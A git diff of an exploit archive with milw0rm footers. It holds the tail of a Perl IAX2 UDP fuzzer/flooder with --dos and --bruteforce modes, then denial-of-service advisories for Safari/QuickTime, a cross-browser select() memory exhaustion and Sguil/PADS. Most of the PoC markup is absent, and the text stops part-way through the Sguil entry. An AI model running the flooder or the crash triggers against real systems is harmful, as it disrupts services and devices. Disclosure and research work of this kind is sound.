'); + } + if(defined($recv[2]) && defined($out_msg) && length($recv[2]) > length($out_msg)) { + print(length($recv[2])-length($out_msg)." bytes difference\n"); + print($out_msg.' '.$recv[2]."\n"); + } + } + } + } + }elsif($frameType eq 'TEXT') { + my $out_msg = $src_call . $dst_call . $timestamp . $outbound_seq . $inbound_seq . $iaxFrameTypes{$frameType} . "00"; #text frame types "must" have a subclass of 0? + if(my @recv = sendUDPSocket($out_msg,$target,$port,$TIMEOUT,1)) { + if(defined($recv[0]) && defined($recv[1])) { + print('['.scalar(localtime).'] '); + print($recv[0].' '.$recv[1].' '.$frameType.' 00 '); + } + if(defined($recv[2]) && defined($out_msg) && length($recv[2]) > length($out_msg)) { + print(length($recv[2])-length($out_msg)." bytes difference\n"); + print($out_msg.' '.$recv[2]."\n"); + } + } + }else{ + foreach my $frameKey (keys(%iaxControlFrames)) { + foreach my $ieKey (keys(%iaxIE)) { + my $out_msg = $src_call . $dst_call . $timestamp . $outbound_seq . $inbound_seq . $iaxFrameTypes{$frameType} . $iaxControlFrames{$frameKey} . $iaxIE{$ieKey}.'00'; + if(my @recv = sendUDPSocket($out_msg,$target,$port,$TIMEOUT,1)) { + if(defined($recv[0]) && defined($recv[1])) { + print('['.scalar(localtime).'] '); + print($recv[0].' '.$recv[1].' '.$frameType.' '.$frameKey." ".$ieKey.' '); + } + if(defined($recv[2]) && defined($out_msg) && length($recv[2]) > length($out_msg)) { + print(length($recv[2])-length($out_msg)." bytes difference\n"); + print($out_msg.' 
'.$recv[2]."\n"); + } + } + } + } + } + } + } +} + +sub sendUDPSocket { + my($msg,$target,$port,$timeout,$listen,@args)=@_; + + my $MAXLEN=1024; + + #my($respaddr,$port); + my $out_msg = pack("H*",$msg); + my $ipaddr = inet_aton($target); + my $sin = sockaddr_in($port,$ipaddr); + send(PING, $out_msg, 0, $sin) == length($out_msg) or die "cannot send to $target : $port : $!\n"; + + if($listen) { + #sleep(.005); + eval { + local $SIG{ALRM} = sub { die "alarm time out"; }; + alarm $timeout; + #alarm $timeout; + while (1) { + my $recvfrom = recv(PING, my $in_msg, $MAXLEN, 0) or die "recv: $!"; + ($port, $ipaddr) = sockaddr_in($recvfrom); + my $respaddr = inet_ntoa($ipaddr); + if($verbose) { + displayIAXRaw($respaddr,$port,$respaddr,$out_msg,$in_msg); + } + return($respaddr,$port,unpack("H*",$in_msg)); + } + }; + return 0; + } +} + +sub bruteForceFUZZ { + my($target,$port,$listen,$timeout,$refFrameTypes,$refControlFrames,$refIE,@args)=@_; + + my %iaxFrameTypes=%{$refFrameTypes}; + my %iaxControlFrames=%{$refControlFrames}; + my %iaxIE=%{$refIE}; + + for(my $a=32768;$a<=32768;$a++) {# Full Packet 4byte + for(my $b=0;$b<=0;$b++) {# Dest Call 4byte + for(my $c=0;$c<=0;$c++) {# Timestamp 8byte + #for(my $d=0;$d<=0;$d++) {# Out Seq # 2byte + my $loopD=1; + #for(my $d=unpack("H2",pack("H2",int(rand(256))));$loopD;$d++) {# Out Seq # 2byte + # $loopD=0; + + my $outbound_seq = unpack("H2",pack("H2",int(rand(256)))); + my $inbound_seq = unpack("H2",pack("H2",int(rand(256)))); + + + #if($verbose) {print(sprintf("%04x",$a)." ".sprintf("%04x",$b)." ".sprintf("%08x",$c)." 
".sprintf("%02x",$d)."\n"); } + for(my $d=0;1;$d++) { + for(my $e=0;1;$e++) {# In Seq # 2byte + foreach my $frameType (keys(%iaxFrameTypes)) { + foreach my $frameKey (keys(%iaxControlFrames)) { + foreach my $ie (keys(%iaxIE)) { + for(my $f=0;$f<=0;$f++) { + my $maxDust=10; + if($listen) { $maxDust/=2; } + if(defined($dust) && length($dust) > 0) { $maxDust=$dust; } + for(my $z=1;$z<=$maxDust;$z++) { + my $len = int(rand(9)); + my $box= int(rand("9"x(($len+1)))); + for(my $zz=1;$zz<=$maxDust;$zz++) { + my $hex_msg = sprintf("%04x",$a).sprintf("%04x",$b).sprintf("%08x",$c).sprintf("%02x",$d).sprintf("%02x",$e). $iaxFrameTypes{$frameType} . $iaxControlFrames{$frameKey} . $iaxIE{$ie} . sprintf("%02x",$f) . sprintf("%0".$len."x",$box); + if($verbose) {print("[" . scalar(localtime) . "] '" . $frameType."_".$frameKey."_".$ie."_".sprintf("%02x",$f)."_".sprintf("%0".$len."x",$box)."'\n"); } + foreach my $var (sendUDPSocket($hex_msg,$target,$port,1,$listen)) { if($verbose) { print($var."_"); } } + } + }}}}}}}}}} #<------ VERY IMPORTANT +} + +sub retIAXHostActive { + my($target,$port,@args)=@_; + my $out_msg=''; + if(my @recv = sendUDPSocket($out_msg,$target,$port,1,1)) { + return 1; + } + return 0; +} + +sub retHosts { + my($host,@args)=@_; + my @addrs; + + if(!$host) { return ('127.0.0.1') }; + + if($host =~ /^([\d]{1,3}).([\d]{1,3}).([\d]{1,3}).([\d]{1,3})\/([\d]{1,2})$/ && $1 >= 0 && $1 <= 255 && $2 >= 0 && $2 <= 255 && $3 >= 0 && $3 <= 255 && $4 >= 0 && $4 <= 255) { + #Check to see if host is valid class C CIDR Address + if($verbose) { print("Setting CIDR Address Range\n"); } + my $sn = Net::Subnets->new; + + my($low,$high)=$sn->range(\$host); + if($verbose) { print("Determined IP Ranges From $$low - $$high\n"); } + return \@{ $sn->list(\($$low,$$high)) }; + }elsif($host =~ /^([\d]{1,3}).([\d]{1,3}).([\d]{1,3}).([\d]{1,3})$/ && $1 >= 0 && $1 <= 255 && $2 >= 0 && $2 <= 255 && $3 >= 0 && $3 <= 255 && $4 >= 0 && $4 <= 255) { + #Check to see if host is valid IP + 
push(@addrs,"$1.$2.$3.$4"); + }else{ + push(@addrs,$host); + } + return \@addrs; +} + +sub displayIAXRaw { + my($respaddr,$port,$out_msg,$in_msg)=@_; + + if(defined($in_msg) && unpack("H*",$in_msg) ne '80000000000000000000060a') { + print("[" . scalar(localtime) . "] $respaddr:$port\t$respaddr\t" . unpack("H*",$out_msg) . "\t". unpack("H*",$in_msg) . "\n"); + }elsif(defined($respaddr) && defined($port)) { + print(scalar(localtime) . " $respaddr:$port\t$respaddr\n"); + + } +} + +sub displayIAXPacket { + my($hex_msg,@args)=@_; + + my $width=32/8; + + for(my $i=0;$i*$width<=length($hex_msg);$i++) { + print(substr($hex_msg,$i*$width,$width)."\n"); + } + #print $hex_msg."\n"; +} + +sub printUsage { + print "$0 --dos\n\t\tWill loop through known or manually preset packet combinations.\n"; + print "$0 --bruteforce\n\t\tBrute force fuzzes on default port of 4569. It will try random data packaging at the end of a valid packet. It will by default send 10 per each packet.\n"; + print "$0 -h 127.0.0.1 --bruteforce --dust 1\n\t\tBrute force fuzzes on default port of 4569. It will try random data packaging at the end of a valid packet. It will only send 1 of each packet.\n"; + print "$0 \n\t\tScans the loopback interface by rough usage from IETF guidelines.\n"; + exit; +} + +sub logAndPrint { + my($string,@args)=@); + + if(1==1 || defined($string)) { + print $string; + open(FLE,">>$0_logs_[".scalar(localtime)."] $string"); + print FLE $string; + close(FLE); + } +} + +# milw0rm.com [2009-06-12] diff --git a/platforms/multiple/dos/8957.txt b/platforms/multiple/dos/8957.txt index a3342f299..0a64b79e1 100755 --- a/platforms/multiple/dos/8957.txt +++ b/platforms/multiple/dos/8957.txt 
@@ -1,130 +1,130 @@ -________________________________________________________________________ - - Apple Safari & Quicktime Denial of Service -________________________________________________________________________ - -Shameless plug : ------------------------------------------------------------------------- -You are invited to join the 2009 edition of HACK.LU, a small but -concentrated luxemburgish security conference. -More information : http://www.hack.lu - CFP is open, sponsorship is still -possible and warmly welcomed. ------------------------------------------------------------------------- - -Release mode: Coordinated -Ref : [TZO-36-2009] - Apple Safari & Quicktime DoS -Vendor : http://www.apple.com -WWW : http://blog.zoller.lu/2009/05/advisory-apple-safari-quicktime-dos.html -Status : Not patched -Credit : none given (Apple can't find a place to credit) -Discovered : 18.11.2008 Zoller, 19.06.2009 Alexios Fakos (probably plenty - of others) -Security notification reaction rating : good -Notification to patch window : n+1 - -Disclosure Policy : http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html - -Affected products -- Apple Safari (all) -- Quicktime (all) - - -I. Background -~~~~~~~~~~~ -Wikipedia quote: "Apple Inc. (NASDAQ: AAPL) is an American multinational -corporation which designs and manufactures consumer electronics and -software products. The company's best-known hardware products include -Macintosh computers, the iPod and the iPhone." - -II. Description -~~~~~~~~~~~~~ -A null pointer is being dereference when CFRelease() is called on NULL. - -III. Impact -~~~~~~~~~ -The browser will crash, your data might be lost. - -IV. Proof of concept (hold your breath) -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - - - - -V. Disclosure timeline -~~~~~~~~~~~~~~~~~~~~~~~ -DD/MM/YYYY -18/11/2008 : Send proof of concept file and a description that failed to - give the correct impact. 
- -25/11/2009 : Apple acknowledges receipt and reproducability : - "After investigating this issue further, we've determined - that the crash your test case triggers is caused by - dereferencing a null pointer and not from a format string issue" - -20/01/2009 : Ask for an update - -23/01/2009 : Apple sends an encrypted and signed PGP mail, fine, however the mail - is encrypted with their own key - -23/01/2009 : Ask for the mail to be resend as I don't have Apple's private key - -24/01/2009 : Apple states that "Regarding the QuickTime null dereference you - reported, this bug is still being worked on by our engineers - and is not addressed in QuickTime 7.6" - -26/01/2009 : Ask apple for a fix timeline as this is an ridiculouly easy to fix - vulnerability - -27/01/2009 : Apple statest "Regarding the QuickTime null deref issue, it is - currently set to be part of the next QuickTime update. [..] - Additionally, we do not intend to describe this crasher in our - security advisory. - - Note: No Security advisory = no credit, should have published here. - -28/01/2009: Apple states "Given that we are handling this as a crasher and - not as a security exposure, it stands to reason that you may - want to disclose it without waiting for the update that - addresses it and without further coordination with Apple. - We do appreciate the fact that you reported it to us and are - intending to address it in the next available update" - -[..] -[Several discussion about CIA, why a DoS against the iPhone is worth a security -advisory, when it isn't against safari.. etc. I spare you the details] -[..] - -29/01/2009 : Ask why I should hold disclosure for a DoS in a particular - portable apple product but disclose DoS in other apple products. 
- Asked apple to make a choice, either DoS is a security issue and - I won't disclose or it isn't and I disclose all of them, - including the one in the very portable apple product - -30/01/2009 : Apple answers that - "Your QuickTime and Safari issues constitute denial of service. - We consider any denial of service issue to be security related, - and they are important to fix. We plan to fix the ones you - reported in the next available updates." - - "I believe we can put credit in an appropriate place for the - WebKit/Safari change. I was not able to locate a suitable place - for crediting the QuickTime crasher" - -Fast forward 5 months, and apple releases a stream of code execution bug fixes -for Quicktime. - -01/06/2009 : Ask for an update and if the DoS condition has been fixed - -02/06/2009 : Apple states that - "According to our bug tracking system the null-dereference crasher - issue is not yet addressed in QuickTime. We are investigating - now to see if for some reason the latest version has picked up - changes that address this issue and will send you feedback - today about it." - -In summary, no credit, no advisory, and 7 months of time to (not) fix a -single line of code. - -10/06/2009 : Release of this advisory - -# milw0rm.com [2009-06-15] +________________________________________________________________________ + + Apple Safari & Quicktime Denial of Service +________________________________________________________________________ + +Shameless plug : +------------------------------------------------------------------------ +You are invited to join the 2009 edition of HACK.LU, a small but +concentrated luxemburgish security conference. +More information : http://www.hack.lu - CFP is open, sponsorship is still +possible and warmly welcomed. 
+------------------------------------------------------------------------ + +Release mode: Coordinated +Ref : [TZO-36-2009] - Apple Safari & Quicktime DoS +Vendor : http://www.apple.com +WWW : http://blog.zoller.lu/2009/05/advisory-apple-safari-quicktime-dos.html +Status : Not patched +Credit : none given (Apple can't find a place to credit) +Discovered : 18.11.2008 Zoller, 19.06.2009 Alexios Fakos (probably plenty + of others) +Security notification reaction rating : good +Notification to patch window : n+1 + +Disclosure Policy : http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html + +Affected products +- Apple Safari (all) +- Quicktime (all) + + +I. Background +~~~~~~~~~~~ +Wikipedia quote: "Apple Inc. (NASDAQ: AAPL) is an American multinational +corporation which designs and manufactures consumer electronics and +software products. The company's best-known hardware products include +Macintosh computers, the iPod and the iPhone." + +II. Description +~~~~~~~~~~~~~ +A null pointer is being dereference when CFRelease() is called on NULL. + +III. Impact +~~~~~~~~~ +The browser will crash, your data might be lost. + +IV. Proof of concept (hold your breath) +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + + + +V. Disclosure timeline +~~~~~~~~~~~~~~~~~~~~~~~ +DD/MM/YYYY +18/11/2008 : Send proof of concept file and a description that failed to + give the correct impact. 
+ +25/11/2009 : Apple acknowledges receipt and reproducability : + "After investigating this issue further, we've determined + that the crash your test case triggers is caused by + dereferencing a null pointer and not from a format string issue" + +20/01/2009 : Ask for an update + +23/01/2009 : Apple sends an encrypted and signed PGP mail, fine, however the mail + is encrypted with their own key + +23/01/2009 : Ask for the mail to be resend as I don't have Apple's private key + +24/01/2009 : Apple states that "Regarding the QuickTime null dereference you + reported, this bug is still being worked on by our engineers + and is not addressed in QuickTime 7.6" + +26/01/2009 : Ask apple for a fix timeline as this is an ridiculouly easy to fix + vulnerability + +27/01/2009 : Apple statest "Regarding the QuickTime null deref issue, it is + currently set to be part of the next QuickTime update. [..] + Additionally, we do not intend to describe this crasher in our + security advisory. + + Note: No Security advisory = no credit, should have published here. + +28/01/2009: Apple states "Given that we are handling this as a crasher and + not as a security exposure, it stands to reason that you may + want to disclose it without waiting for the update that + addresses it and without further coordination with Apple. + We do appreciate the fact that you reported it to us and are + intending to address it in the next available update" + +[..] +[Several discussion about CIA, why a DoS against the iPhone is worth a security +advisory, when it isn't against safari.. etc. I spare you the details] +[..] + +29/01/2009 : Ask why I should hold disclosure for a DoS in a particular + portable apple product but disclose DoS in other apple products. 
+ Asked apple to make a choice, either DoS is a security issue and + I won't disclose or it isn't and I disclose all of them, + including the one in the very portable apple product + +30/01/2009 : Apple answers that + "Your QuickTime and Safari issues constitute denial of service. + We consider any denial of service issue to be security related, + and they are important to fix. We plan to fix the ones you + reported in the next available updates." + + "I believe we can put credit in an appropriate place for the + WebKit/Safari change. I was not able to locate a suitable place + for crediting the QuickTime crasher" + +Fast forward 5 months, and apple releases a stream of code execution bug fixes +for Quicktime. + +01/06/2009 : Ask for an update and if the DoS condition has been fixed + +02/06/2009 : Apple states that + "According to our bug tracking system the null-dereference crasher + issue is not yet addressed in QuickTime. We are investigating + now to see if for some reason the latest version has picked up + changes that address this issue and will send you feedback + today about it." + +In summary, no credit, no advisory, and 7 months of time to (not) fix a +single line of code. + +10/06/2009 : Release of this advisory + +# milw0rm.com [2009-06-15] diff --git a/platforms/multiple/dos/9071.txt b/platforms/multiple/dos/9071.txt index ef823441c..14bf1a019 100755 --- a/platforms/multiple/dos/9071.txt +++ b/platforms/multiple/dos/9071.txt 
@@ -1,84 +1,84 @@ -___________________________________________________________________________________ - -Apple Safari 4.x JavaScript Reload Denial of Service -___________________________________________________________________________________ - -Author : Marcell 'SkyOut' Dietl, Achim Hoffmann -Email : mail [at] marcell-dietl [dot] de -Vendor : http://www.apple.com/ -Product : http://www.apple.com/safari/ -Found : 12.06.2009 -Released : 01.07.2009 - -Tested on: - - Safari 4.0 at Windows XP SP3 - - Safari 4.0.1 at Mac OS X 10.5.7 -___________________________________________________________________________________ -STEPS TO REPRODUCE - -1) Create a HTML file with the following content: - -+---------- -| -| -| -| -| -| -+---------- - -2) Create an empty file called "empty.js" in the same directory. - -3) Put both files into the WWW directory of your server. - -4) Access the HTML file with your browser. - - A popup will appear: Close it. - - A popup will appear: Close it. - - Crash. - -5) On Windows: - -+---------- -| AppName: safari.exe AppVer: 4.530.17.0 ModName: webkit.dll -| ModVer: 4.530.17.0 Offset: 00305f55 -+---------- - -5) On Mac OS X: - -+---------- -| Process: Safari [298] -| Path: /Applications/Safari.app/Contents/MacOS/Safari -| Identifier: com.apple.Safari -| Version: 4.0.1 (5530.18) -| Build Info: WebBrowser-55301800~1 -| Code Type: X86 (Native) -| Parent Process: launchd [163] -| -| Date/Time: 2009-07-01 00:58:48.144 +0200 -| OS Version: Mac OS X 10.5.7 (9J61) -| Report Version: 6 -| -| Exception Type: EXC_BAD_ACCESS (SIGBUS) -| Exception Codes: KERN_PROTECTION_FAILURE at 0x0000000000000002 -| -| Thread 0 crashed with X86 Thread State (32-bit): -| eax: 0x00000002 ebx: 0x900bac11 ecx: 0x00625eec edx: 0x00000000 -| edi: 0x00625ec8 esi: 0x00000002 ebp: 0xbfffe778 esp: 0xbfffe5e0 -| ss: 0x0000001f efl: 0x00010217 eip: 0x900bac74 cs: 0x00000017 -| ds: 0x0000001f es: 0x0000001f fs: 0x00000000 gs: 0x00000037 -| cr2: 0x00000002 -+---------- 
-___________________________________________________________________________________ -Advisory : http://marcell-dietl.de/index/adv_safari_4_x_js_reload_dos.php - -Live Demo : http://marcell-dietl.de/index/demo_safari_4_x_js_reload_dos.html - -Apple has been informed about the bug, but did not show any interest. -___________________________________________________________________________________ -HAVING FUN WITH FULL DISCLOSURE SINCE 2006 - -# milw0rm.com [2009-07-02] +___________________________________________________________________________________ + +Apple Safari 4.x JavaScript Reload Denial of Service +___________________________________________________________________________________ + +Author : Marcell 'SkyOut' Dietl, Achim Hoffmann +Email : mail [at] marcell-dietl [dot] de +Vendor : http://www.apple.com/ +Product : http://www.apple.com/safari/ +Found : 12.06.2009 +Released : 01.07.2009 + +Tested on: + - Safari 4.0 at Windows XP SP3 + - Safari 4.0.1 at Mac OS X 10.5.7 +___________________________________________________________________________________ +STEPS TO REPRODUCE + +1) Create a HTML file with the following content: + ++---------- +| +| +| +| +| +| ++---------- + +2) Create an empty file called "empty.js" in the same directory. + +3) Put both files into the WWW directory of your server. + +4) Access the HTML file with your browser. + - A popup will appear: Close it. + - A popup will appear: Close it. + - Crash. 
+ +5) On Windows: + ++---------- +| AppName: safari.exe AppVer: 4.530.17.0 ModName: webkit.dll +| ModVer: 4.530.17.0 Offset: 00305f55 ++---------- + +5) On Mac OS X: + ++---------- +| Process: Safari [298] +| Path: /Applications/Safari.app/Contents/MacOS/Safari +| Identifier: com.apple.Safari +| Version: 4.0.1 (5530.18) +| Build Info: WebBrowser-55301800~1 +| Code Type: X86 (Native) +| Parent Process: launchd [163] +| +| Date/Time: 2009-07-01 00:58:48.144 +0200 +| OS Version: Mac OS X 10.5.7 (9J61) +| Report Version: 6 +| +| Exception Type: EXC_BAD_ACCESS (SIGBUS) +| Exception Codes: KERN_PROTECTION_FAILURE at 0x0000000000000002 +| +| Thread 0 crashed with X86 Thread State (32-bit): +| eax: 0x00000002 ebx: 0x900bac11 ecx: 0x00625eec edx: 0x00000000 +| edi: 0x00625ec8 esi: 0x00000002 ebp: 0xbfffe778 esp: 0xbfffe5e0 +| ss: 0x0000001f efl: 0x00010217 eip: 0x900bac74 cs: 0x00000017 +| ds: 0x0000001f es: 0x0000001f fs: 0x00000000 gs: 0x00000037 +| cr2: 0x00000002 ++---------- +___________________________________________________________________________________ +Advisory : http://marcell-dietl.de/index/adv_safari_4_x_js_reload_dos.php + +Live Demo : http://marcell-dietl.de/index/demo_safari_4_x_js_reload_dos.html + +Apple has been informed about the bug, but did not show any interest. +___________________________________________________________________________________ +HAVING FUN WITH FULL DISCLOSURE SINCE 2006 + +# milw0rm.com [2009-07-02] diff --git a/platforms/multiple/dos/9160.txt b/platforms/multiple/dos/9160.txt index a87c402c5..240b6852c 100755 --- a/platforms/multiple/dos/9160.txt +++ b/platforms/multiple/dos/9160.txt 
@@ -1,148 +1,148 @@ -________________________________________________________________________ - - One bug to rule them all - IE5,IE6,IE7,IE8,Netscape,Firefox,Safari,Opera,Konqueror, - Seamonkey,Wii,PS3,iPhone,iPod,Nokia,Siemens.... and more. - Don't wet your pants - it's DoS only -________________________________________________________________________ - -Release mode: Tried hard to coordinate - gave up -Reference : [GSEC-TZO-26-2009] - One bug to rule them all -WWW : http://www.g-sec.lu/one-bug-to-rule-them-all.html -Vendors : -http://www.firefox.com -http://www.apple.com -http://www.opera.com -http://www.sony.com -http://www.nintendo.com -http://www.nokia.com -http://www.siemens.com -others.. -Status : Varies -CVE : CVE-2009-1692 (created by apple same root cause) -Credit : Except Apple - nobody - -Affected products : -~~~~~~~~~~~~~~~~~ -- Internet Explorer 5, 6, 7, 8 (all versions) -- Chrome (limited) -- Opera -- Seamonkey -- Midbrowser -- Netscape 6 & 8 (9 years ago) -- Konqueror (all versions) -- Apple iPhone + iPod -- Apple Safari -- Thunderbird -- Nokia Phones : Nokia N95 (Symbian OS v.9.2),Nokia N82, Nokia N810 Internet Tablet -- Aigo P8860 (Browser hangs and cannot be restarted) -- Siemens phones -- Google T-Mobile G1 TC4-RC30 -- Ubuntu (Operating system sometimes reboots, memory management failure) -- possibly more devices and products that support Javascript, -try it yourselves. 
POC here : http://www.crashthisthing.com/select.html - -Patch availability : -~~~~~~~~~~~~~~~~~~ -- Mozilla : Fixed in Firefox 3.0.5 and 2.0.0.19 -https://bugzilla.mozilla.org/show_bug.cgi?id=460713 -- Apple iPhone&iPod : patched -- IE : No patch for IE5, IE6, IE7, IE8 until IE9 -- Webkit : Patched in r41741 - https://bugs.webkit.org/show_bug.cgi?id=23319 -- Chrome : Patched, unknown which version) -- Opera : Patched after version 9.64 -- Thunderbird (unknown) -- Konqueror : unknown (did not respond) -- Nokia : unknown, opened a case but never came back -- Aigo P8860 : unknown -- Siemens : unknown -- Others ? Find out by visiting the POC at -http://crashthisthing.com/select.html - - -I. Background -~~~~~~~~~~~ -Quoting Wikipedia "ECMAScript is a scripting language, standardized by Ecma -International in the ECMA-262 specification and ISO/IEC 16262. The language -is widely used on the web, especially in the form of its three best-known -dialects, JavaScript, ActionScript, and JScript." - - -II. Description -~~~~~~~~~~~~~ -Calling the select() method with a large integer, results in continuos -allocation of x+n bytes of memory exhausting memory after a while. -The impact varies from null pointer dereference (no more memory,hence -crashing the browser) to the reboot of the complete Operation System -(Konqueror&Ubuntu) - -There had never been a limit specified as to how many html elements the select -call should handle, after the report of this Bug, vendors apparently agreed to a -limit of 10.000 elements : "Talked to some Apple and Opera guys at the -WHATWG social, and we decided this was a good number" - -III. Impact -~~~~~~~~~ -The Impact varies from Browser to Browser and from OS to OS. - -Here is a small excerpt: -- Konqueror (Ubuntu)- allocates 2GB of memory then either crashes -the Browser or (most often) the OS reboots. Ubuntu's memory -management system appears to be configured as to NOT stop the process -that consumes too much memory, but a random process. 
-This sometimes leads to processes that are vital for the OS to -be killed, hence the reboot. I am not kidding. Thanks to -'FX' for Memory management hint. - -- Chrome : allocates 2GB of memory then crashes tab with a null pointer - -- Firefox : allocates 2GB of memory then the Browser crashes - -- IE5,6,7,8 : allocates 2GB of memory then the Browser crashes - -- Opera : Allocated and commits as much memory as available, -will not crash but other applications will become unstable - -- Nintento WII (Opera) : Console hangs, needs hard reset -Video: http://vimeo.com/2937101 (Thanks to David Raison) - -- Sony PS3 - Console hangs, needs hard reset -Video: http://vimeo.com/2937101 (Thanks to Chris Gates) - -- iPhone - iPhone hangs and needs hard reset -Video: http://vimeo.com/2873339 (Thanks to g0tcha) - -- Aigo P8860 (Browser hangs and cannot be restarted) - - -IV. Proof of concept -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - - -URL: http://www.crashthisthing.com/select.html - -Some have not understood what this code does, it does NOT loop as some vendors -claimed, it just calls select.lenght() ONCE with a huge integer. One might wonder -if over the 9 last years that this bug existed, nobody ever entered a large -number in a select.lenght() call. - -IV. Disclosure timeline -~~~~~~~~~~~~~~~~~~~~~~~ -Nothing particular to note, except the usual discussion about availability being -a security issue. - -V. Thanks -~~~~~~~~~~~~~~~~~~~~~~~ -Chris Gates, David Raison, Fahem Adam, a team of engineers that recognise themselves -and oCert for not helping coordinate this bug. - -# milw0rm.com [2009-07-15] +________________________________________________________________________ + + One bug to rule them all + IE5,IE6,IE7,IE8,Netscape,Firefox,Safari,Opera,Konqueror, + Seamonkey,Wii,PS3,iPhone,iPod,Nokia,Siemens.... and more. 
+ Don't wet your pants - it's DoS only +________________________________________________________________________ + +Release mode: Tried hard to coordinate - gave up +Reference : [GSEC-TZO-26-2009] - One bug to rule them all +WWW : http://www.g-sec.lu/one-bug-to-rule-them-all.html +Vendors : +http://www.firefox.com +http://www.apple.com +http://www.opera.com +http://www.sony.com +http://www.nintendo.com +http://www.nokia.com +http://www.siemens.com +others.. +Status : Varies +CVE : CVE-2009-1692 (created by apple same root cause) +Credit : Except Apple - nobody + +Affected products : +~~~~~~~~~~~~~~~~~ +- Internet Explorer 5, 6, 7, 8 (all versions) +- Chrome (limited) +- Opera +- Seamonkey +- Midbrowser +- Netscape 6 & 8 (9 years ago) +- Konqueror (all versions) +- Apple iPhone + iPod +- Apple Safari +- Thunderbird +- Nokia Phones : Nokia N95 (Symbian OS v.9.2),Nokia N82, Nokia N810 Internet Tablet +- Aigo P8860 (Browser hangs and cannot be restarted) +- Siemens phones +- Google T-Mobile G1 TC4-RC30 +- Ubuntu (Operating system sometimes reboots, memory management failure) +- possibly more devices and products that support Javascript, +try it yourselves. POC here : http://www.crashthisthing.com/select.html + +Patch availability : +~~~~~~~~~~~~~~~~~~ +- Mozilla : Fixed in Firefox 3.0.5 and 2.0.0.19 +https://bugzilla.mozilla.org/show_bug.cgi?id=460713 +- Apple iPhone&iPod : patched +- IE : No patch for IE5, IE6, IE7, IE8 until IE9 +- Webkit : Patched in r41741 - https://bugs.webkit.org/show_bug.cgi?id=23319 +- Chrome : Patched, unknown which version) +- Opera : Patched after version 9.64 +- Thunderbird (unknown) +- Konqueror : unknown (did not respond) +- Nokia : unknown, opened a case but never came back +- Aigo P8860 : unknown +- Siemens : unknown +- Others ? Find out by visiting the POC at +http://crashthisthing.com/select.html + + +I. 
Background +~~~~~~~~~~~ +Quoting Wikipedia "ECMAScript is a scripting language, standardized by Ecma +International in the ECMA-262 specification and ISO/IEC 16262. The language +is widely used on the web, especially in the form of its three best-known +dialects, JavaScript, ActionScript, and JScript." + + +II. Description +~~~~~~~~~~~~~ +Calling the select() method with a large integer, results in continuos +allocation of x+n bytes of memory exhausting memory after a while. +The impact varies from null pointer dereference (no more memory,hence +crashing the browser) to the reboot of the complete Operation System +(Konqueror&Ubuntu) + +There had never been a limit specified as to how many html elements the select +call should handle, after the report of this Bug, vendors apparently agreed to a +limit of 10.000 elements : "Talked to some Apple and Opera guys at the +WHATWG social, and we decided this was a good number" + +III. Impact +~~~~~~~~~ +The Impact varies from Browser to Browser and from OS to OS. + +Here is a small excerpt: +- Konqueror (Ubuntu)- allocates 2GB of memory then either crashes +the Browser or (most often) the OS reboots. Ubuntu's memory +management system appears to be configured as to NOT stop the process +that consumes too much memory, but a random process. +This sometimes leads to processes that are vital for the OS to +be killed, hence the reboot. I am not kidding. Thanks to +'FX' for Memory management hint. 
+ +- Chrome : allocates 2GB of memory then crashes tab with a null pointer + +- Firefox : allocates 2GB of memory then the Browser crashes + +- IE5,6,7,8 : allocates 2GB of memory then the Browser crashes + +- Opera : Allocated and commits as much memory as available, +will not crash but other applications will become unstable + +- Nintento WII (Opera) : Console hangs, needs hard reset +Video: http://vimeo.com/2937101 (Thanks to David Raison) + +- Sony PS3 - Console hangs, needs hard reset +Video: http://vimeo.com/2937101 (Thanks to Chris Gates) + +- iPhone - iPhone hangs and needs hard reset +Video: http://vimeo.com/2873339 (Thanks to g0tcha) + +- Aigo P8860 (Browser hangs and cannot be restarted) + + +IV. Proof of concept +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + +URL: http://www.crashthisthing.com/select.html + +Some have not understood what this code does, it does NOT loop as some vendors +claimed, it just calls select.lenght() ONCE with a huge integer. One might wonder +if over the 9 last years that this bug existed, nobody ever entered a large +number in a select.lenght() call. + +IV. Disclosure timeline +~~~~~~~~~~~~~~~~~~~~~~~ +Nothing particular to note, except the usual discussion about availability being +a security issue. + +V. Thanks +~~~~~~~~~~~~~~~~~~~~~~~ +Chris Gates, David Raison, Fahem Adam, a team of engineers that recognise themselves +and oCert for not helping coordinate this bug. + +# milw0rm.com [2009-07-15] diff --git a/platforms/multiple/dos/9175.txt b/platforms/multiple/dos/9175.txt index 19317a629..2ac9efd69 100755 --- a/platforms/multiple/dos/9175.txt +++ b/platforms/multiple/dos/9175.txt 
@@ -1,81 +1,81 @@ -Sguil/PADS Denial of Service exploit -by Ataraxia (Benjamin Rose) -Public announcement made 7/15/09. - -Please visit http://allmybase.com/ (my blog) for more up-to-date -information, and a quick patch. - -More in-depth article available at: http://allmybase.com/?p=72 - -This more in-depth article does include additional details and -the actual code that is being exploited, if you're interested... - -########################################################################## -UPDATE 7/17/09 @ 14:41: -In speaking with the creators of the sguil software, it seems that -I have greatly overestimated the reach of this bug. I had assumed that -it would be possible to run multiple SQL commands within a single TCL -mysqlexec() statement, an assumption that now seems incorrect. This means -that, at best, this hole becomes a denial of service attack that could -inject incorrect data into the sguil database, and/or kill the sguil -daemon, a noisy operation. My apologies for this initial overzealousness. -########################################################################## - -ORIGINAL POST, UNMODIFIED: -This exploit has the ability to render any Intrusion Detection -System utilizing the sguil monitoring useless. At the lowest level, -you can kill the master logging daemon that collates the data into -a MySQL database. I've also been able to inject random and useless -data into the MySQL database, which opens the door for an obfuscation -of an attack, or a flat-out denial of service attack. There also exists -the possibility of dropping the database altogether, though I was not -able to make this happen during my preliminary testing of the attack. - -The sguil sensor boxes report back to a sguil daemon on a management server, -which in turn puts the data received into a MySQL database. The sensor -collects data from many sensor agents, the most popular ones including snort -and sancp. 
